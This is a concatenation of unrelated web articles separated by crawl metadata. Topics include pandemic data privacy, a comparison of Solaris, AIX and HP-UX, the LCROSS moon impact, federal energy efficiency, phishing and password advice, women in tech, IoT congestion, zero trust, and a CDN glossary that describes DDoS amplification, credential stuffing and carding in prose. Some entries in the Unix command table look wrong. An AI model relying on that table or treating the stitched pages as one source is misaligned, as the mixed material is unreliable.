A recent study at Oxford University is an addition to the groups of experts advocating the method of ‘contact tracing’ to nip the infectious disease at its bud. In this approach, the location of the infected person is tracked, and anyone who has come in contact with the patient is informed and warned for isolation.
Europe and the US, in collaboration with giants like Facebook and Google, are now looking at similar ways to track down infected people. Few might opine that this is an invasion of privacy.
Several countries in Asia, like China and South Korea, have reportedly relied on surveillance of mobile phones to track the infected individual’s activities and reportedly shared their information with others. Some countries are also building apps that can help patients to enter their test results and make them available to the health officials for tracking them down.
Singapore has taken measures with the aid of the TrackTogether app, which uses Bluetooth technology to tether with other Bluetooth enabled and the app installed devices. The app maintains a log of people who have been within the Bluetooth radius for at least half an hour.
In countries with stringent privacy laws, the data collected through telecom operators is anonymous and aggregated wherein the trends of the congregation of the infection and the
map of the disease spread is tracked.
Although dire times due to COVID-19 call for extreme measures by authorities, the fundamental issue of data privacy is raked up yet again. Although a global pandemic can be a reason enough to use the collected private data for the greater good, the expectations about privacy protections cannot be ignored.
Rights and obligations of the employers pertaining to COVID-19
With the COVID-19 outbreak impacting businesses worldwide, many privacy advocates are warning enterprises against demanding excess information from employees and to adhere to
the privacy laws of their respective countries. Many enterprises have sought travel bans and ordered health tests for their employees as a crucial step to stop the spread of the pandemic. However, these enterprises are walking on a narrow bridge as employees may not be comfortable to share their personal information. For instance, in Europe, as per the General Data Protection Regulation (GDPR), the regulations are clear that the employee data can only be collected for a specific reason (and) can only be obtained with consent.
For the past few weeks, many countries like the Netherlands, France, Italy, Denmark, and a few more issued statements for bidding enterprises from collecting excessive employee data.
Although the pandemic is dangerous, “it does not give a free reason to gather private data”, argue the privacy advocates.
Apart from maintaining employee private information (and sharing it with government agencies when necessary), enterprises are also tasked with the challenges of employees working remotely which presents the danger of exposing organizational data opening a Pandora box of data security concerns.
Within an enterprise network, there are adequate security protocols in place. Working remote adds in local and public network exposing the organization’s IT infrastructure to unprecedented risks. In such situations, taking necessary security enhancing steps – working on Virtual Private Networks (VPN), avoiding the usage of USB sticks, using secure cloud services etc., will come
Another challenge for enterprises is to maintain the data from the DSAR (Data Subject Access Requests) forms submitted by consumers whilst ensuring consumers their right to access of
information. While collecting data amidst this chaos can be useful, additional costs of maintaining the data and ensuring easy access to consumers can potentially add billions of dollars of overhead to organizations.
Keeping all these potential problems in view, just taking some necessary steps in ensuring data security will not be sufficient. Having a robust data privacy framework is the way ahead to deal efficiently with significant data privacy concerns during these testing times.
What does the law say?
As more and more nations struggle to keep up with the fight against the COVID-19, many of them are moving towards tracking mobile phone information of consumers, raising widespread privacy alarms across the world. In such situations, the data privacy laws of countries can be a guiding light to businesses, government agencies, and consumers who know their rights and will stand against any breach of privacy.
For instance, in Europe, the General Data Protection Regulation (GDPR) has been in place for a couple of years now. This regulation is directly applicable to all its member states in the
interest of consumer data protection. However, many member states have asked for allowance to move their privacy regulations as well.
Similarly, in the United States, the California Consumer Privacy Act (CCPA) has imposed strict data privacy regulations that allow enterprises to collect and use consumer data only upon consent and also places restrictions on when and how the information can be shared with third parties. Following California, many other states like New York are also in the process of
passing stringent data privacy regulations.
Developing countries like Brazil also have their version of GDPR called the Lei Geral de Proteção de Dados Pessoais or LGPD. This was passed in 2018 and presents a series of regulations to organizations to comply thereby ensuring the protection of private individual information.
In India, the Personal Data Protection Bill was passed in 2019; this bill specifically prohibits the collection or processing of sensitive personal data of people without any specific, explicit, and lawful purpose. The bill stresses important aspects like consent, protection of data, and restricts sharing information among third parties without consent.
With more and more countries around the world moving towards their own privacy regulation bills, it seems that the importance of ensuring privacy through efficient systems and software in place should be considered more than ever by small and big enterprises around the globe.
The COVID-19 crisis has now raised an alarm on many global activities and has significantly changed the approach and working style of many businesses. While tracking of patients and isolating them can be an effective way to ensure the reduction of the virus spread, the question remains on how ethical is it given that one shouldn’t cross the fine line of protection and privacy breach? Should there be relaxations or changes in the privacy regulations like the CCPA or GDPR to fuel up the already slow and hit businesses across the globe?
The enterprises have many challenges ahead of them. Not only do they have to deal with the visible recession but will also have to handle the issue of overhead costs of ensuring robust security and privacy systems providing safe remote working conditions. Recently enforced CCPA timeline puts more pressure on enterprises to respond to the consumers and the regulatory authorities on addressing the following issues:
- What data is being collected
- How enterprises will store this data
- With whom the data is shared (and)
- Where the data processing will take place.
By being prepared with the solutions to this complex challenge will help enterprises build transparency and trust.
What price do enterprises have to pay for this global crisis for further strengthening their IT infrastructure? With the amount of data in terms of health information, travel history, and other employee’s personal information reaching humungous proportions, what measures should enterprises undertake to handle the massive bout of data?
Although there are many apprehensions in the current scenario, one thing is quite clear – having a secure data privacy framework in place can aid enterprises around the world to reduce the burden of ensuring data privacy hugely on their internal infrastructure. | <urn:uuid:a2c15c5b-4a25-4b9e-86e0-c9d8805bf683> | CC-MAIN-2022-40 | https://www.lightsondata.com/data-protection-during-pandemic/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00154.warc.gz | en | 0.938509 | 1,574 | 2.96875 | 3 |
In a previous article, I compiled a list of the top 50 Unix commands. Each of the commands I discussed are available on the top three Unix variants: Solaris, AIX and HP-UX. In this article, I'll walk you through the illustrious history of these Unix flavors, discuss some their fundamental differences and close with a command table comparison of important tasks.
Solaris, Sun's Unix version, was actually the successor of SunOS, going back to1992. SunOS was originally based on the BSD flavor of Unix, while SunOS versions 5.0 and later are based on Unix System V Release 4 (rebranded as Solaris).
How did this happen? Let's go further back in time. SunOS version 1.0 was introduced in 1983 with support for Sun-1 and Sun-2 systems. Version 2.0 was introduced in 1985 -- its claim to fame was virtual file system (VFS) and NFS. In 1987, AT&T and Sun announced that they would work together on a project to merge System V and BSD into one release, based on SVR4. Solaris 2.4 was Sun's first Sparc/x86 release. The last release of SunOS was version 4.1.4 in November 1994. Solaris 7 was its first 64-bit Ultra Sparc release and added native support for file system metadata logging. Solaris 9, introduced in 2002, added support for Solaris Volume Manager and Linux capabilities. Solaris 10 was first introduced in 2005, which has a number of innovations, including support for its new ZFS file system, Solaris Containers and Logical Domains.
Solaris is presently up to version 10; the latest update was released in October 2008. Among its innovations is support for paravirtualisation, where Solaris 10 is used as a guest in Xen-based environments.
Fundamental differences and unique characteristics. Solaris is free and open source, distributed through the OpenSolaris operating system. Solaris is a more command-line based Unix operating system than HP-UX or AIX. As a practical matter, it does not have anything comparable to System Administration Manager (SAM) on HP-UX or System Management Interface Tool (SMIT) on AIX. Solaris runs on Sparc and x86 environments. It also has the newest file system around -- ZFS, which has made great strides in recent years, including the ability to now use it as its root file system. ZFS has the potential to be the best all-around Unix file system. Solaris has many ways to implement virtualisation, including Containers/zones, xVM Server, Logical Domains and hardware partitioning.
HP-UX, Hewlett-Packard's Unix, was originally based on System V release 3. It initially ran exclusively on PA-RISC HP 9000 platform. Version 1 of HP-UX was released in 1984. Version 9, introduced its character-based graphical user interface (GUI), SAM, from which one administrates the system. Version 10, introduced in 1995, brought changes in the layout of the system file and directory structure, making it similar to AT&T SVR4. Version 11 was introduced in 1997 and was HP's first release to support 64-bit addressing. In 2000, it was rebranded to 11i, when HP introduced operating environments, bundled groups of layered applications for specific IT purposes. In 2001, Version 11.20 introduced support for Itanium systems. HP-UX was the first Unix that used Access Control Lists (ACLs) for file permissions and was also one of the first to introduce built-in support for Logical Volume Manager. Today, HP-UX uses Veritas as its primary file system due to the close partnership between Veritas and HP. HP-UX is currently up to release 11iv3, update 4.
Fundamental differences and unique characteristics. HP-UX is the first of the Unix systems to allow its customers to purchase specific operating environments. For example, if you are looking for its high availability (HA) product Serviceguard, you would purchase the specific product that bundles in HA. HP-UX is the only version that uses a third-party file system -- Veritas (Sun used to offer this many years ago). HP has many forms of virtualisation, including nPartitions, vPars, Integrity Virtual Machines (IVMs) and resource partitions. This does have a tendency to confuse some folks because there are so many choices. HP-UX runs on both HP 9000s and Integrity Itanium systems. HP-UX 11v3 can support up to 128 processor cores. HP-UX provides for a very strong command line in addition to its menu bases system, SAM. Performance tuning using kctune is in many ways simpler to what AIX and Solaris offer.
AIX was introduced by IBM in 1986. While it is based on Unix System V, it also has BSD roots and, more than any other flavor, is a hybrid of both. AIX is the first OS to introduce a journaled file system (JFS). It was also the first to have an integrated Logical Volume Manager (LVM). IBM first ported AIX to its RS/6000 platform in 1989. Version 5L was a breakthrough release introduced in 2001 that provided for Linux affinity and logical partitioning with the Power4 servers. In 2004, AIX introduced virtualisation in AIX 5.3. Advanced Power Virtualisation (APV) offered micro-partitioning, shared processor pools and Symmetric multi-threading. In 2007, IBM enhanced its virtualisation product, coinciding with the release of AIX 6.1 and the Power6 architecture. It also rebranded APV to PowerVM. The AIX enhancements included a form of workload partitioning called WPARs, which are similar to than Solaris zones/Containers but with better functionality. The latest release is AIX 6.1.
Fundamental differences and unique characteristics. IBM is widely recognized as having the best virtualisation product on the midrange, PowerVM. Some recent innovations include live application mobility (allowing one to fail over working partitions without taking downtime), Active Memory Sharing and multiple shared processor pools. No other flavor of Unix can boast these virtualisation characteristics, nor can they match IBM's 40-year history of virtualisation -- PowerVM has evolved from mainframe/System z virtualisation.
AIX runs only on IBM Power Systems -- easily the most powerful of midrange Unix servers. IBM sells the fact that AIX runs exclusively on Power as a plus because it is fully optimized on this architecture and it has a clear road map around which the company adheres to religiously. It should also be noted that one can run both Linux and AIX partitions on this platform. Its LX86 virtualisation add-on allows one to run x86 Linux applications that are not ported to the Power architecture. AIX has always had an integrated logical volume manager, unlike other flavors that require add-on products. AIX is the only Unix that has continued to grow market share in recent years, partly because of the capabilities of its Power hardware that continues to lead the field in reliably, availability and scalability.
Command reference comparison
|What are you trying to do?||Solaris||AIX||HP-UX|
|Specify order of name server resolution||/etc/nsswitch.conf||/etc/netsvc.conf||etc/nsswitch.conf|
|Configure networking||/etc/nodename, /etc/netmasks, etc/defaultrouter, ifconfig||recommendation is to use SMIT, because ifconfig does not save changes, lsattr||set_parms - initial, netconf file, ioscan|
|Understand available file systems||ufs, zfs||jfs, jfs2||hfs, VxFS|
|Add space to file systems||growfs||chfs||extendfs|
|Look at character-based admin GUI||None. Admintool was retired years ago. SMC (similar to AIX's WebSM) is the GUI||SMIT, smitty, WebSM||SAM|
|Examine hardware changes||prtconf||lscfg, lsattr, prtconf||ioscan, dmesg|
|View swap space||swap||lsps||swapinfo|
|Examine file system info||/etc/vfstab||/etc/file systems||/etc/fstab|
|Check software and/or filesets||pkginfo, pkgchk||lslpp, lssrc||swlist|
|Install software||pkgadd||smit install||swinstall|
|Check error logs||prtdiag||errpt||dmesg|
|Tune the kernel||prtctl and /etc/system||vmo, ioo, no, schedo, nfso, chdev||kctune|
|start/stop services||Svcadm, svcs||lssrc, stopsrc, startsrc||Usually initiated by scripts from init.d I.E. for network -- /etc/init.d/net start| | <urn:uuid:f1e953bd-771c-440a-814f-46d8ff652725> | CC-MAIN-2022-40 | https://www.computerweekly.com/news/2240020657/Whats-the-best-Unix-for-you-We-compare-AIX-HP-UX-and-Solaris | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00154.warc.gz | en | 0.925903 | 1,969 | 2.78125 | 3 |
Early this morning, the astronomy and space world watched as the Northrop Grumman-built Lunar CRater Observation and Sensing Satellite (LCROSS) successfully impacted the moon’s Cabeus crater, ending a 112-day mission to find water ice on the moon that could serve as a resource for future lunar outposts. According to NASA, the debris cloud created by LCROSS’ impact produced good telemetry and was recorded by space and ground-based observatories. NASA will gather and analyze impact data from professional and amateur astronomers worldwide over the next several months to determine if water ice is present.
LCROSS uses a standardized structural element; commercial-off-the-shelf hardware, sensors and components; flight-proven payload instruments and sophisticated risk management. The spacecraft was ready for delivery in just 29 months for a total mission cost of $79 million.
“The success of this mission is a tribute to the tremendous engineering skills and partnership between Northrop Grumman and NASA Ames Research Center, ” said Steve Hixson, vice president of Advanced Concepts-Space and Directed Energy Systems for Northrop Grumman Aerospace Systems. “We believe LCROSS will open the doors to new research and exploration missions based on the LCROSS model.” | <urn:uuid:02682f1c-fe46-4a7e-be49-b0077e5d90a5> | CC-MAIN-2022-40 | https://www.govconwire.com/2009/10/northrop-grumman-built-satellite-successfully-impacts-moon/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00154.warc.gz | en | 0.920353 | 267 | 3.09375 | 3 |
A combination of recent federal policies and emerging technologies have the potential to significantly curb agencies’ energy spending.
The federal government owns or operates some 500,000 buildings across the world, and it spends billions of dollars each year heating, cooling and pumping water to and from them.
The numbers are staggering. The Defense Department alone spends $20 billion annually on energy consumption, according to Sharon Burke, former assistant secretary of defense for operational energy.
Speaking Oct. 28 in Washington, D.C., Burke, who’s now a senior adviser at the New America Foundation, said about $4 billion of that total goes toward electricity, with the “lion’s share” spent on actual military operations.
Yet, a combination of recent federal policies – the administration’s Climate Action Plan, a 2009 executive order and other federal sustainability efforts – and emerging technologies have the potential to significantly curb energy spending for defense and civilian agencies without reducing functionality.
“There’s no pushing efficiency if it is at odds with the mission because it won’t survive,” said Burke, alluding to the notion that any successful green initiative will only be as successful as its ability to improve mission performance.
“There are a lot of opportunities for improving without losing performance,” Burke added. “It’s key because the second you lose performance, you lose.”
Discovering new Technologies
One of the unique offshoots in the government’s green efforts is the Green Proving Ground, a department housed within the General Services Administration.
The Green Proving Ground leverages GSA’s vast real-estate portfolio to transparently evaluate emerging green technologies such as energy management, lighting and on-site energy generation.
The proving ground examines technologies in partnership with national laboratories and makes recommendations on whether to “broadly deploy, target deploy or not to deploy,” across government, according to GSA Chief Greening Officer Eleni Reed.
Thus far, assessed green technologies that have shown promise include advanced power strips, condensing boilers, magnetic levitation chillers and wireless network sensors, though 26 technology evaluations are ongoing across federal buildings across the country.
Efforts at the Green Proving Ground could further GSA’s successes in energy efficiency.
Reed said GSA has reduced carbon emissions by 53 percent in its building operations, and the agency spearheaded successful sustainability outcomes through the American Recovery and Reinvestment Act. That includes a 19 percent energy consumption reduction and 120 million gallons of water saved annually across almost 500 federal buildings and renewable energy generation capabilities in 89 buildings.
Reed said big data and analytics are beginning to play a role in the government’s sustainability efforts, too.
GSA’s “Smart Metering” initiative, Reed said, highlights how applied analytics can be run on large data sets – showing power consumption, for example -- to improve efficiencies.
Under the initiative, GSA was able to obtain consumption data every 15 minutes over a catalog of 400 federal buildings. The data is useful to property managers who can notice changes in consumption patterns in near real-time. It’s akin to a building telling its manager where and when it is using energy.
“Property managers can identify spikes and analyze trends, year after year, and take action to correct,” Reed said.
What about Security?
Smart buildings that provide real-time analytics sound like a great concept, but there’s an underlying danger -- especially for those involved in military operations.
Energy consumption, just like any other data, could feasibly be vulnerable to cyber adversaries.
“There are security vulnerabilities in the era of big data with smart metering, because loads could signify activity,” said Jeffrey Johnson, regional command information officer for Naval District Washington.
Naval District Washington accounted for those vulnerabilities in its recent “Smart Shore” initiative, Johnson said.
The pilot project aimed to ultimately reduce the cost of utility delivery across facilities, but one of the keys to its success, Johnson said, was measuring demand on each system. Of course, that information in the wrong hands could be dangerous, so Johnson said Naval District Washington did not explicitly name the system each load came from.
Even with unauthorized access to metered data, an adversary wouldn’t have the ability to tie it to specific systems. Altogether, the pilot has created some major efficiency gains for Naval District Washington without compromising security or performance, Johnson said. | <urn:uuid:b2ee2949-6b1f-4c20-9df3-6257ef17d07f> | CC-MAIN-2022-40 | https://www.nextgov.com/emerging-tech/2014/10/governments-sustainability-efforts-present-big-data-opportunity/97844/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00154.warc.gz | en | 0.931368 | 932 | 2.59375 | 3 |
Last month, researchers at Fortinet observed a sophisticated phishing email sent to a Hungarian diplomat. In the email, cybercriminals disguised themselves by using the first and last name of an employee in the diplomat’s IT department. In this case, the diplomat believed that the email was suspicious and forwarded it to the actual employee in the IT department for investigation.
This case is a perfect example of a popular attack called spear phishing. Spear phishing attacks are targeted at a single person or department that has information that cybercriminals want. In these attacks, cybercriminals conduct research on the specific person or department and figure out who they talk to frequently. Then, the cybercriminals send a message to the person or department, pretending to be someone they know and trust. It’s important to watch out for these attacks because they can happen to anyone, not just diplomats or executives.
Follow these tips to stay safe from spear phishing attacks:
Stop, Look, and Think. Don’t be fooled.
KnowBe4 is the world’s most popular integrated platform for awareness training combined with simulated phishing attacks. Let Keller Schroeder show you how KnowBe4 has helped thousands of organizations just like yours manage the continuing problem of social engineering. Contact us today to learn more.
DISCLAIMER : Any non-technical views expressed are not necessarily those of Keller Schroeder or its employee-owners. | <urn:uuid:013d5dfa-4134-461e-89fd-a0de7d586aea> | CC-MAIN-2022-40 | https://www.kellerschroeder.com/news/2022/05/security-tip-of-the-week-sophisticated-spear-phishing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00154.warc.gz | en | 0.942602 | 292 | 2.765625 | 3 |
Government experts at the UK National Cyber Security Centre (NCSC) have concluded that three random words as a password are a safer bet than any more complicated variations.
The NCSC, which is part of GCHQ, concluded that three words provide as much variety as much more complicated and at times convoluted passwords combining numbers, letters and symbols. The simple formula is very difficult for cybercriminals to second guess and is harder for the software they use to crack than the conventional mixed passwords.
NCSC did add that the key to the success of this system was the unpredictability of the three words and not making the password too personal or obvious, was very important to its success.
With cybercrime levels reaching record highs during the pandemic it has become even more important than ever to look for new ways to protect personal data from cybercriminals.
The NCSC’s Technical Director, Dr Ian Levy, said: "Traditional password advice telling us to remember multiple complex passwords is simply daft. There are several good reasons why we decided on the three random words approach – not least because they create passwords that are both strong and easier to remember. By following this advice, people will be much less vulnerable to cybercriminals and I’d encourage people to think about the passwords they use on their important accounts, and consider a password manager.”
And just in case we need reminding why this is important the following stats make sobering reading. If your data is compromised, weak passwords can have serious consequences, like identity theft. Companies reported a staggering 5,183 data breaches in 2019 that exposed personal information such as home addresses and login credentials that could easily be used to steal your identity or commit fraud. And that pales in comparison with the more than 555 million stolen passwords that hackers on the dark web have published since 2017. | <urn:uuid:9402ca33-270c-4663-aff0-84610665b50e> | CC-MAIN-2022-40 | https://cybermagazine.com/cyber-security/are-three-random-words-really-safest-password | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00354.warc.gz | en | 0.967231 | 371 | 2.9375 | 3 |
Technology is a field that is often thought of as male-dominated, and though men do seem to be the face of modern technology, women have been innovating, inventing, and leading the way to new advancements for just as long as men have. This Women’s History Month, we want to celebrate just some of these inspiring figures in the history of tech. From the first programmer to one of the inventors of the Internet—and beyond—we’d like to share a timeline of women’s accomplishments in technology. Some of these names are probably familiar to you, but we also hope you learn a little something about our industry.
A Short History of Women’s Contributions in Tech
Ada Lovelace published the first algorithm, to be run by Charles Babbage’s Analytical Engine, making her the first computer programmer—before we were able to actually invent computers, even.
Edith Clarke was an electrical engineer at GE. She invented the Clarke calculator, which could solve line equations with hyperbolic functions ten time faster than any other process.
The women at the Moore School of Engineering set up the Electronic Numerical Integrator and Computer (ENIAC) to calculate bomb trajectories in WWII.
Evelyn Boyd Granville became the second African American woman to receive a Ph.D. in mathematics from Yale University. She used her considerable talents to help with the Apollo space program, including calculating celestial mechanics and trajectories.
Grace Hopper invented FLOW-MATIC, the first data processing language to resemble actual English and a predecessor of the influential programing language COBOL.
Margaret Hamilton is credited with coming up with the term “software engineering.” She led a team that developed the in-flight software for the Apollo missions and Skylab.
Katherine Johnson was instrumental to calculating the launch window for Alan Shepard’s first space flight. Later, the astronaut John Glenn refused to use the numbers calculated for his orbit by electronic computers unless they were verified by Johnson.
Sister Mary Kenneth Keller became the first American woman to receive a Ph.D. in Computer Science. She went on to advocate for the use of computers in education and to encourage women to get involved in computer science.
Radia Perlman invented the spanning tree protocol (STP), one of the foundations of the Internet as we know it.
Shafi Goldwasser received the Gödel Prize in Mathematics for co-inventing probabilistic encryption, the basis for modern data encryption security.
Marissa Mayer was hired as the first female engineer at Google. She became part of the 3-person team who created AdWords (now GoogleAds), Google’s primary revenue generator.
Ruchi Sanghvi became the first female engineer at Facebook. She was instrumental in creating the platform’s News Feed, rolled out in 2006.
Ginni Rometty became the first woman to head IBM, serving as president, chairperson, and CEO.
Gladys West was inducted into the Air Force Space and Missile Pioneers Hall of Fame for her work in developing GPS technology.
These women and their innovations still have an impact on our world today, and this is only a small handful of the incredible minds that shaped technology. We can only begin to imagine what the future holds for today’s women in tech! | <urn:uuid:99ae1e3f-6ab7-4677-86ee-a20b0a41f49c> | CC-MAIN-2022-40 | https://community.connection.com/impact-of-women-in-technology/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00354.warc.gz | en | 0.959247 | 737 | 3.75 | 4 |
It is estimated that there are already 14 billion objects connected to the Internet, so that is currently more than 2 devices per man, woman and child in the world today. Industry analysts are projecting that this could rise to anywhere from 20 billion devices to 100 billion by 2020 and if IoT really takes off in a big way with more connected cars, more wearable tech (both for recreational and healthcare monitoring purposes), and more connected buildings etc., it is easy to see how such growth is going to be achieved. Some may suggest that even 100 billion connected devices is a bit on the conservative side.
In most cases, these devices will act as sensors and, individually, only demand relatively small amounts of network bandwidth to communicate small amounts of data. However, when you scale this up to many millions or billions of connected devices, the demand on the network becomes huge.
Of course, we can expect network capacity to continue increasing but can it realistically keep up with demand to the point where every single device will enjoy an unhindered network experience? I think not. We just have to look at the situation with our home networks. Over the years, our ISPs have doubled, tripled, quadrupled the bandwidth delivered to our homes and yet we still receive complaints (mainly from our offspring) that “the internet is slow” as they try to stream a film, participate in online gaming, Skype with friends etc.
The reality is that we very rarely get anywhere near the full bandwidth promised by our ISPs because the network has to be shared with the other subscribers around us. Now, add in the steady increase in the number of devices we have added to our own wireless networks, first wireless printers, then laptops and smart phones, then tablets and smart TVs. So, a bit like adding an extra lane to a motorway, initially, we enjoy better connection speeds when our ISP ups the available bandwidth but then we add more devices to the network and the benefit is short-lived. Now, if IoT does come to full fruition, we may well be adding another 10 or 20 devices to our home networks, all competing for limited WiFi connectivity.
Consider this situation at a national level: There is going to be a huge proliferation in the number of devices, all vying for the network. So, accepting that network demand is probably going to outstrip supply for the foreseeable future how can IoT device and systems providers ensure their connected objects are going to work well over congested and contested networks? Well, no matter how elegantly a device is designed – no matter how well it performs within the safety and comfort of the test lab – it must cope with the issues of operating over real and potentially hostile networks. Devices that cannot tolerate adverse network conditions will result in frustrated customers and damaged reputations for the supplier.
What will separate many of these devices from even our mobile phone experiences is that they will be operator-less. Unlike a mobile app where, if it doesn’t work, you might change location or even network, these devices and their centralised controlling software will have to implement a strong autonomous recovery approach in the event of the inevitable network issues they will face.
In order to achieve this tolerance or resilience IoT suppliers need to accept that they can’t improve the public networks over which their connected devices will need to operate but it is in their remit to improve their device’s tolerance and resilience by first fully understanding how it performs in the real world networked environment and knowing the point at which the device is likely to fail.
If they are armed with this information, at every stage of the development and deployment process, they will be able to engineer tolerance or resilience into the final product and iTrinegy’s virtual test networks provide the ideal testbed in which to properly assess and manage risk throughout the development and deployment of your IoT systems.News Blog | <urn:uuid:f1cd80ba-652e-487f-baef-3e9c56960ba8> | CC-MAIN-2022-40 | https://itrinegy.com/how-will-iot-devices-cope-with-crowded-networks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00354.warc.gz | en | 0.959784 | 780 | 2.6875 | 3 |
Cybercrime, phishing attempts, and security hacks are all on the rise worldwide. These data breaches can be costly to businesses and individuals. They leech your valuable time, energy, and information, as well as revenue and finances. Over the next five years, the cost of cybercrime is expected to rise by 15% per year. If trends continue as expected, this will lead to a $10.5 trillion cost annually by 2025.
Enter zero trust cybersecurity. Zero trust is an attempt to meet the moment globally. Zero trust methodology aims to address both the constantly evolving methods of cybercriminals, as well as the shifting needs of businesses, governments, and consumers.
What is Zero Trust Cybersecurity?
Zero trust is similar to a zero tolerance policy, in that it assumes risk can come from anywhere, at any time. Most traditional security models grant some kind of lasting trust to users logging in from recognized networks, locations, or IP addresses. The zero trust model, however, assumes there is no network edge, and therefore there can be no lasting reliability.
Instead, zero trust requires that all users, whether inside or outside an organization’s network, have their credentials be constantly checked, authenticated, and validated. This continual reauthorization is necessary before accessing or downloading any files, applications, or data within the protected network.
Origins of Zero Trust
Zero trust was invented by John Kindervag, widely considered one of the world’s foremost cybersecurity experts. Kindervag is currently Field CTO with Palo Alto Networks after years at Forrester Research. The creation of the zero trust model is attributed to his field work as a cybercrime analyst. It has since been adopted by Google, Coca Cola, many airlines, and more.
Notably, the zero trust model has also been recommended by the US House of Representatives. After the disastrous OPM data breach, the House issued an official recommendation that all government agencies adopt the zero trust model
Example of a Zero Trust System
To understand how zero trust works, Google has compared the model to going to the airport. Traditionally, at the airport, you must present your identification and ticket to security before accessing the gates. This would be the equivalent of sharing your IP address (like a passport, to prove who you are), as well as your authorized destination (your ticket, showing where you plan to go). In a zero trust model, every time you log in, you must show these credentials and have them be authenticated. Similarly, every time you fly, you have to present the same proofs, even if you have flown from that airport, and to the same destination, before. This re-authentication is what sets zero trust apart from traditional network security, which assumes that users who have logged in (or checked in) once before can continue to be trusted.
Additionally, gate access is restricted in the zero trust model, under this airport metaphor. Gone would be the option to wander freely from gate to gate, once you have presented your credentials once at security. Instead, even authorized users can only access the specific applications and destinations that they requested upon entry. This extra step limits the amount of damage that an impersonator would be able to do, assuming that they were able to evade detection at the initial checkpoint.
Differences Between Zero Trust and VPN Networks
Both VPNs and zero trust can be deployed to enable remote users to access confidential materials. This makes both systems especially helpful as more companies continue to ask employees to work from home. Both VPNs and zero trust models are attempts to manage the increased risk from having so many different remote access points.
However, VPNs and zero trust security manage this risk in different ways. A VPN creates a remote perimeter. It grants access to all authorized users and managed devices who log in through the VPN. Zero trust, by contrast, automatically restricts access to all users, assuming there is no trusted network.
While zero trust is a newer concept in cybersecurity, and thus less proven than VPN technology, it is an attempt to restrict the amount of damage that a hacker can do, once they have gained access to the trusted network created by the VPN.
Benefits of Zero Trust
Zero trust upends the traditional perimeter security model by restructuring the framework of risk. Some benefits include:
- Portability – The zero trust model can be accessed by users all over the globe. Gone are the physical limitations of needing a dedicated office space and company network.
- Flexibility – A zero trust model has less initial set up for users than requesting access to a VPN, minimizing onboarding time.
- Security – Zero trust is designed to mitigate the risks of network perimeters, or the “blast radius” if a breach does occur.
- Invisibility – Despite the multiple authentications necessary, zero trust should be seamless for users. They should be able to sign in and use a strong second factor in order to conduct business as usual.
Evolution of Zero Trust Security
As more businesses and users utilize hybrid cloud technology to store data, zero trust is a necessary evolution within the cybersecurity landscape to help mitigate the associated increased risk. When done correctly, zero trust lives up to its motto of “never trust, always verify” and can create a stronger, safer online experience for companies, governments, and individuals. | <urn:uuid:29449a84-e8c9-44a6-8352-3ffbc4209398> | CC-MAIN-2022-40 | https://news.networktigers.com/opinion/zero-trust-what-it-is-and-why-it-matters/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00354.warc.gz | en | 0.946944 | 1,087 | 2.875 | 3 |
Amplified DDoS attacks
Amplification refers to a set of methods to increase the volume of attacks, typically through the abuse of non-suspecting 3rd party servers. A good example of such amplification is DNS amplification, in which queries are made to DNS servers that resolve domain names into IP addresses. When using the UDP protocol, the source IP of queries made to DNS servers is not verified. An attacker can therefore make a short request that yields a much longer response, while providing the IP address of the attacked target instead of the real IP making the request. The DNS server will send a response, which may be 10 or even 50 times longer than the query, to the attack target. Thus attackers can increase vastly the impact of their attacks.
API stands for Application Programming Interface. An API is a software intermediary that allows two or multiple software applications to talk to each other. It also allows extension mechanisms so that users are able to extend current functionality in various ways.
Also See: CDN Pro
Application acceleration is a network solution focus around maximizing web application’s speed for end users. Application acceleration is used for issues like WAN latency, bandwidth congestion. Applications that require extensive interactive content, this technology allows quick rendering and increase loading speed that could meet user expectation.
Also see: Enterprise Solutions
A Backdoor is a type of malware which bypasses or negates normal authentication procedures for the purpose of accessing a system illicitly. Remote access is thus permitted to system resources, such as databases and file servers, allowing perpetrators to issue system commands and update the malware remotely.
“Big data” is a term to describe data sets that are too large or too complex to be processed or analysed by traditional data-processing application software. Currently, it tends to refer the use of data analytics methods or user behavior analytics that need to extract value from data.
Brute Force Attacks
Brute Force attacks are automated attempts to access restricted resources, such as user accounts, by trying to log in or access the resource again and again with incremental tiny variations of usernames, passwords or other parameters.
Cache is a hardware or software component that stores data thus future requests for that data can be served faster. Caching is at the core of content delivery network (CDN) services. CDN copies website content to proxy servers which are optimized for content distribution.
CDN (Content Delivery Network)
A content delivery network (CDN) refers to geographically distributed large network of proxy servers and data centers. CDN is to provide high availability and good performance by distributing content spatially relative to end users. Companies across different verticals employ CDN to deliver media (such as video, audio and streaming), HTTP content, and download files.
Also see: How Content Delivery Network Works
Most operators find CDN solutions are fundamental for delivering the services and contents to keep pace with the growing demand for streaming media, online gaming. CDN services provide a cost effective solution. Without CDN, it is impossible to satisfy consumers’ need for fast and secured online experience from any device.
For network operators who want to benefit from CDN without managements CDNetworks offers leading solutions for CDN services. For developers who want to take charge of their own CDN and be more flexible with the cost and performance, CDNetworks offers CDN Pro with our unique self-serving features.
A Credential Stuffing attack is a variant of Brute Force. In these cases, the attacker already has a list of user names, emails and passwords, typically stolen or leaked from a site or service. This list is used to try and access accounts on a different site or service, leaning on the fact that users tend to re-use passwords on multiple services.
Credit Card Stuffing (Carding)
Similar to Credential Stuffing, in which passwords stolen from one site or service are used on another one, Carding uses stolen credit card information from one site or service to run an automated process to verify each card’s validity by charging small amounts on the checkout page or via the API of a different site.
Cross Site Scripting (XSS)
